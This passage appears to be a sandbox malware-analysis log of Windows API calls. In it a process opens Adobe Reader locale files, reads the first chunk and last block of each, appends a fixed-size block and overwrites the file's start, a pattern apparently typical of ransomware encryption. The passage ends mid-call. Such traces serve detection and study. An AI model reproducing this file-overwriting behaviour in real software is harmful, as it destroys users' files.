SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.776] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2a00 [0083.776] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.776] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.776] ReleaseMutex (hMutex=0x168) returned 1 [0083.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.NLD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.NLD", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.NLD", lpUsedDefaultChar=0x0) returned 12 [0083.777] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.779] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1a00 [0083.779] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.780] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1a00 [0083.780] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.780] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.780] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.781] CloseHandle (hObject=0x1f0) returned 1 [0083.781] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Checkers.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\checkers.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.782] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.782] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1e800 [0083.782] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.782] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.782] ReleaseMutex (hMutex=0x168) returned 1 [0083.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.POL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.POL", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.POL", lpUsedDefaultChar=0x0) returned 12 [0083.783] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.937] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1d800 [0083.937] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.938] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1d800 [0083.938] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.938] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.938] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.939] CloseHandle (hObject=0x1f0) returned 1 [0083.939] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\pddom.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\pddom.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.940] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.940] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2a00 [0083.940] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.940] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.940] ReleaseMutex (hMutex=0x168) returned 1 [0083.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.POL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0083.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.POL", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.POL", lpUsedDefaultChar=0x0) returned 9 [0083.940] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.943] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1a00 [0083.943] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.944] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1a00 [0083.944] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.944] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.944] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.944] CloseHandle (hObject=0x1f0) returned 1 [0083.945] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.946] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.946] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x94c7 [0083.946] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.946] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.946] ReleaseMutex (hMutex=0x168) returned 1 [0083.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0083.947] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.948] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x84c7 [0083.949] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.949] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x84c7 [0083.950] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.950] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.950] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.950] CloseHandle (hObject=0x1f0) returned 1 [0083.951] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Annots.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\annots.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0084.286] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.292] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x79e00 [0084.292] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.292] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.293] ReleaseMutex (hMutex=0x168) returned 1 [0084.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.PTB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.PTB", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.PTB", lpUsedDefaultChar=0x0) returned 10 [0084.293] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0084.353] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x78e00 [0084.353] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.375] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x78e00 [0084.376] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.376] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0084.377] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0084.377] CloseHandle (hObject=0x1d4) returned 1 [0084.377] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\makeaccessible.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\makeaccessible.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0084.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x13200 [0084.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.378] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.378] ReleaseMutex (hMutex=0x168) returned 1 [0084.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.PTB", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0084.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.PTB", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.PTB", lpUsedDefaultChar=0x0) returned 18 [0084.379] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0084.390] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x12200 [0084.390] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.422] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x12200 [0084.423] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.423] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0084.423] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.423] CloseHandle (hObject=0x1d4) returned 1 [0084.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Search.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\search.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0084.424] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.424] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6000 [0084.424] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.425] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.425] ReleaseMutex (hMutex=0x168) returned 1 [0084.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.PTB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.PTB", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.PTB", lpUsedDefaultChar=0x0) returned 10 [0084.425] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.439] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5000 [0084.439] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.449] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5000 [0084.450] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.450] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0084.450] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.450] CloseHandle (hObject=0x1d4) returned 1 [0084.451] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Acroform.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\acroform.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0084.451] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.451] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6a800 [0084.451] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0084.452] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.452] ReleaseMutex (hMutex=0x168) returned 1 [0084.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.RUM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.RUM", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.RUM", lpUsedDefaultChar=0x0) returned 12 [0084.452] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0084.473] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x69800 [0084.473] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.483] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x69800 [0084.483] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.483] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: 